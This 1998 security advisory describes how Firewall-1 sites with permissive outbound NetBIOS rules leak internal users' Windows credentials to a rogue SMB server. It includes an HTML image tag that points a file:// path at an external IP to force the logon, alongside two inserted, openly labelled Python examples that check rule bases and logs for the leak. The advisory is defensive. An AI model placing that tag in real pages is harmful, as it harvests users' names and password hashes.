How FW-1 is vulnerable when Internet Explorer and Netscape are used on NT or Windows 95 stations

Author: Christian ALT

Sites defended by FW-1 can be vulnerable to the new holes found in Netscape and Internet Explorer. For the aggressor to gain information about the internal users (account name and password), the site must have one of the following misconfigurations:

The rule stating:

Source           Destination   Services                       Action
Internal hosts   any           any                            accept

or the rule stating:

Source           Destination   Services                       Action
Internal hosts   any           nbname nbsession nbdatagram    accept
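To make the effect of those two rules concrete, here is an added example (not code from the original page, and not FW-1's own rule-base format): a first-match walk over a simplified rule base in the same column order as the tables above. The "Internal hosts" group, the rule dictionaries and the addresses are constructed for the example; the implicit drop at the end of the rule base is assumed. It shows that both misconfigured bases let an internal host open nbname, nbsession and nbdatagram connections to an external address, and that a base with an explicit NetBIOS drop placed before the outbound accept does not, while still allowing HTTP.

```python
import ipaddress
from typing import Dict, List, Optional, Tuple

# Well-known NetBIOS-over-TCP/IP service names as used in the page's tables.
NETBIOS_SERVICES = {"nbname", "nbdatagram", "nbsession"}

# Constructed "Internal hosts" group: RFC 1918 ranges chosen for the example.
INTERNAL_HOSTS = [ipaddress.ip_network("10.0.0.0/8"),
                  ipaddress.ip_network("192.168.0.0/16")]

# A rule is a plain dict with the page's columns (Source, Destination,
# Services, Action). This is a constructed representation, not the format
# FW-1 itself stores rule bases in.
Rule = Dict[str, object]


def _host_matches(obj: str, ip: str) -> bool:
    """Does a source/destination object cover this address?"""
    addr = ipaddress.ip_address(ip)
    if obj == "any":
        return True
    if obj == "Internal hosts":
        return any(addr in net for net in INTERNAL_HOSTS)
    return addr in ipaddress.ip_network(obj, strict=False)


def _service_matches(services: object, service: str) -> bool:
    return services == "any" or service in services


def first_match(rules: List[Rule], src: str, dst: str, service: str) -> Optional[Rule]:
    """First-match evaluation, top to bottom. None means no rule matched,
    i.e. the connection falls through to the (assumed) implicit drop."""
    for rule in rules:
        if (_host_matches(rule["src"], src)
                and _host_matches(rule["dst"], dst)
                and _service_matches(rule["services"], service)):
            return rule
    return None


def outbound_netbios_leaks(rules: List[Rule],
                           internal_host: str = "192.168.1.20",
                           external_host: str = "203.0.113.10") -> List[Tuple[str, int]]:
    """Which NetBIOS services can the internal host open towards an external
    address, and which rule number accepts each one?"""
    leaks = []
    for service in sorted(NETBIOS_SERVICES):
        rule = first_match(rules, internal_host, external_host, service)
        if rule is not None and rule["action"] == "accept":
            leaks.append((service, rule["no"]))
    return leaks


# The two misconfigurations described on the page, as constructed rule bases.
MISCONFIGURED_ANY: List[Rule] = [
    {"no": 1, "src": "Internal hosts", "dst": "any", "services": "any", "action": "accept"},
]
MISCONFIGURED_NETBIOS: List[Rule] = [
    {"no": 1, "src": "Internal hosts", "dst": "any", "services": {"http", "ftp"}, "action": "accept"},
    {"no": 2, "src": "Internal hosts", "dst": "any", "services": set(NETBIOS_SERVICES), "action": "accept"},
]
# Corrected base: the NetBIOS drop sits before the outbound accept, so the
# browser-triggered SMB connection never reaches the broad rule.
CORRECTED: List[Rule] = [
    {"no": 1, "src": "Internal hosts", "dst": "any", "services": set(NETBIOS_SERVICES), "action": "drop"},
    {"no": 2, "src": "Internal hosts", "dst": "any", "services": {"http", "ftp"}, "action": "accept"},
]

if __name__ == "__main__":
    for name, base in [("any-service rule", MISCONFIGURED_ANY),
                       ("explicit NetBIOS rule", MISCONFIGURED_NETBIOS),
                       ("corrected", CORRECTED)]:
        print(f"{name}: {outbound_netbios_leaks(base) or 'no outbound NetBIOS'}")
```

Rule order is the point: the same drop rule placed after the outbound accept would never be reached under first-match evaluation.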


The principle of penetration follows:

An internal user accesses an external web server. The downloaded document contains a link exploiting a vulnerability in the browser and opens a new connection to a rogue SMB server. The web page contains an embedded image, and that image does not reside in the same directory as the web page: it resides on an SMB LAN Manager (Lanman) server rather than on an HTTP server.

HTML CAN FORCE AN SMB NEGOTIATION

In order for the client to download the image, the client needs to 'log on' to the Lanman server. Windows NT seems to do this without even asking the user for confirmation: it simply forwards the username and an encrypted version of the user's password to the Lanman server. The Lanman server code has been modified slightly to record the usernames and "hashed passwords" of the victims. The code has also been modified to supply the client with a fixed "challenge seed value" for password encryption, which makes the client passwords less difficult to decode later.

This is the kind of HTML code that leads to the penetration:

<p><font size="2" face="Arial"><img src="file://\\128.95.42.180\ietest\userpass.gif"> </font></p>

Why we show this information

Several sites that we were auditing contained this kind of misconfiguration, due to the belief that everything initiated from the internal network is OK.

We also saw situations where the firewall runs under NT and the system administrator has installed a browser on the firewall itself for convenience. Since these misconfigurations are not isolated cases, we want to make people aware of what can happen.

In the log file you will see the accepted HTTP transaction followed by the accepted nbname, nbsession and nbdatagram transactions from the same internal host.
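The log pattern just described can be searched for mechanically. The following is an added example (not from the original page) that scans a constructed sample log for accepted NetBIOS connections from internal hosts to external addresses, and separately reports those that follow an accepted HTTP connection from the same host within a short window, which is the sequence a browser-triggered SMB logon produces. The field layout (date, time, action, source, destination, service, protocol), the internal address ranges and the log lines are all assumptions made for this example, not FW-1's actual log format.

```python
import ipaddress
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

NETBIOS_SERVICES = {"nbname", "nbdatagram", "nbsession"}

# Constructed internal ranges for the example.
INTERNAL_NETS = [ipaddress.ip_network("192.168.0.0/16"),
                 ipaddress.ip_network("10.0.0.0/8")]

# Constructed sample log. The column layout is assumed for this example and
# is not FW-1's own log format. Addresses are from documentation ranges.
SAMPLE_LOG = """\
1998-03-14 10:02:11 accept 192.168.1.20 203.0.113.10 http tcp
1998-03-14 10:02:13 accept 192.168.1.20 203.0.113.10 nbname udp
1998-03-14 10:02:13 accept 192.168.1.20 203.0.113.10 nbsession tcp
1998-03-14 10:05:40 drop 192.168.1.21 203.0.113.10 nbsession tcp
1998-03-14 10:06:02 accept 192.168.1.22 198.51.100.5 http tcp
1998-03-14 11:30:00 accept 203.0.113.77 192.168.1.20 nbsession tcp
"""

Record = Dict[str, object]


def parse_log(text: str) -> List[Record]:
    """Split each non-empty line into the assumed seven fields."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, time_, action, src, dst, service, proto = line.split()
        records.append({
            "ts": datetime.strptime(f"{date} {time_}", "%Y-%m-%d %H:%M:%S"),
            "action": action, "src": src, "dst": dst,
            "service": service, "proto": proto,
        })
    return records


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def _outbound_netbios_accept(r: Record) -> bool:
    return (r["action"] == "accept" and r["service"] in NETBIOS_SERVICES
            and is_internal(r["src"]) and not is_internal(r["dst"]))


def accepted_outbound_netbios(records: List[Record]) -> List[Tuple[str, str, str]]:
    """Every accepted NetBIOS connection leaving the internal network.
    Dropped connections and inbound ones are not reported."""
    return [(r["src"], r["dst"], r["service"])
            for r in records if _outbound_netbios_accept(r)]


def browser_triggered_smb(records: List[Record],
                          window_seconds: int = 60) -> List[Tuple[str, str, str, int]]:
    """Outbound NetBIOS accepts preceded, within the window, by an accepted
    HTTP connection from the same internal host. Returns
    (src, dst, service, seconds since that HTTP connection)."""
    window = timedelta(seconds=window_seconds)
    http = [r for r in records if r["action"] == "accept" and r["service"] == "http"]
    hits = []
    for r in records:
        if not _outbound_netbios_accept(r):
            continue
        prior = [h for h in http
                 if h["src"] == r["src"] and timedelta(0) <= r["ts"] - h["ts"] <= window]
        if prior:
            latest = max(prior, key=lambda h: h["ts"])
            hits.append((r["src"], r["dst"], r["service"],
                         int((r["ts"] - latest["ts"]).total_seconds())))
    return hits


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for hit in browser_triggered_smb(recs):
        print("NetBIOS after HTTP from the same host:", hit)
```

On the sample, the two accepted connections from 192.168.1.20 are reported; the dropped nbsession from 192.168.1.21 and the inbound nbsession from 203.0.113.77 are not.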

Corrections

Modify any rule that would allow outgoing nbname, nbsession or nbdatagram service from internal hosts, including rules that accept "any" service outbound.

Credit to:

We do not claim any credit for this information: we followed what was indicated on the site http://www.ntshop.net and applied it to the Firewall-1 environment. Refer to that site for the complete information.


Telecom and Logistics Associates SARL, Contact: calt@tla.ch
10, Rue des Savoises CH-1205 Geneva, Phone & fax +41 22 328 14 88

Copyright © 1998 Telecom and Logistics Associates SARL
All brand names are trademarks or registered trademarks of their respective holders.